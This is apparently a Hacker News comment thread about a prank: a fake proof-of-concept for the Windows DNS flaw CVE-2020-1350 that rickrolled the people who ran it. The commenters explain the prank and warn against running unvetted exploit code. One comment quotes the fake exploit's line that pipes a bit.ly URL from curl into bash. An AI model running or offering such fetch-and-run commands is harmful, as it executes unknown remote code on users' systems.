4 ms·
The day I trolled the entire internet: accidental research project CVE-2020-1350
- stedaniels 6y agoTook one glance at the shell script piping curl to bash and red flags went up everywhere! Not only piping curl to bash, but doing it via a bit.ly link. Then Twitter and the media started to pick it up and pass it on unverified. I should have been shocked, but I wasn't. I'd love to see the bit.ly stats for the short URLs added to the article.
- curiousgal 6y agoTL;DR: posted fake PoC on GitHub. (I think, the post is littered with embedded tweets and memes, super hard to read or make sense of any of it)
- kevsim 6y agoYeah, I think that's the gist. Fake PoC of a CVE, people ran random code, author caught them in the act via a canary token [0] and rickrolled them. 0: https://blog.thinkst.com/p/canarytokensorg-quick-free-detection.html https://blog.thinkst.com/p/canarytokensorg-quick-free-detect...
- speedgoose 6y agoThis is very difficult to read and understand.
- araknafobia 6y agoI came here hoping that someone would explain what is really going on. Now I feel a bit better since I am not the only one.
- ogre_codes 6y agoThat's my take. Just random garbage. There is a thread of something in there, but I don't have the time/ energy to quite get it. Something about a fake hack, Rickrolling, and piping curl to the shell. Beyond that I gave up because it's too poorly organized.
- saagarjha 6y agoLooks to be someone posted a fake exploit and people ran it.
- greenshackle2 6y agoYeah they completely fail to explain the context. CVE-2020-1350 is a real vulnerability that was published just yesterday: https://nvd.nist.gov/vuln/detail/CVE-2020-1350 https://nvd.nist.gov/vuln/detail/CVE-2020-1350 It's a brand new vuln so people would be interested in a proof of concept. The author created a git repo that was nominally a PoC exploit for this vulnerability but was really just a troll, and publicized it on twitter. Some people ran the "proof of concept" code without reading it first and got trolled. If the author had been malicious they could have done something much worse than rickrolling. The repo also contains a real fix for the vulnerability. This is a particularly "amusing" troll because the sort of people who keep up with CVEs and look for proof-of-concept exploits should really know better than to run random code they just got off GitHub without checking what it does. It's obvious with the most cursory examination of the code in the repo that you shouldn't run it, exploit.sh contains: curl -L https://bit.ly/3exifav | bash
- rurban 6y agoYou need a few clicks to get to the meat (Rick Ashley of course) https://github.com/ZephrFish/CVE-2020-1350/blob/master/exploit.sh https://github.com/ZephrFish/CVE-2020-1350/blob/master/explo...
- saagarjha 6y agoThe actual meat: https://raw.githubusercontent.com/keroserene/rickrollrc/master/roll.sh https://raw.githubusercontent.com/keroserene/rickrollrc/mast...
- 3pt14159 6y agoI'm sure people are stupid, I've seen it myself too many times to count, but how does he know that these weren't executed in a VM? A couple hundred shells isn't so much that I'd rule out that some non-trivial fraction of them were under analysis.
- petercooper 6y agoI imagine the reason this doesn't happen too often in serious domains is because the next time the person says/posts anything, will they be believed without checking their claims? Of course, in security, this may even be a good thing?(!) :-)
- Sodman 6y agoI think the interesting thing here is that outlets like Vulcan picked it up and wrote about it with authority. Linking to the repo from these "trusted" sources likely gave it a lot more credibility than it would otherwise have received.
- floatingatoll 6y agoI was unable to scroll this article on mobile to read it. It seems like it could be interesting, but it’s too bad about the technical obstacles to doing so.
- _tk_ 6y agoWith the numbers shown "the entire internet" is really more than exaggerated and thus the title seems pretty clickbait-y.
- dapids 6y agoIs the blog post fake too? Seriously, this was hard to read...
- rideontime 6y agoThe author's next post: "The day I trolled the entire internet by posting an inscrutable meme-screed to HN."
- kerng 6y agoThis post requires a lot of context to make sense out of. Unless you are in the security space and familiar with what happened last 36 hours, it probably won't make much sense quickly. 1) Microsoft has a critical flaw in DNS server 2) A security company publishes the info - no public exploit available at this point 3) Someone creates a fake exploit - playing a prank on hackers and other security companies 4) Lots of people ran the prank code or helped spread the existence of the fake exploit Not sure if this makes it easier to understand- at least I tried. :)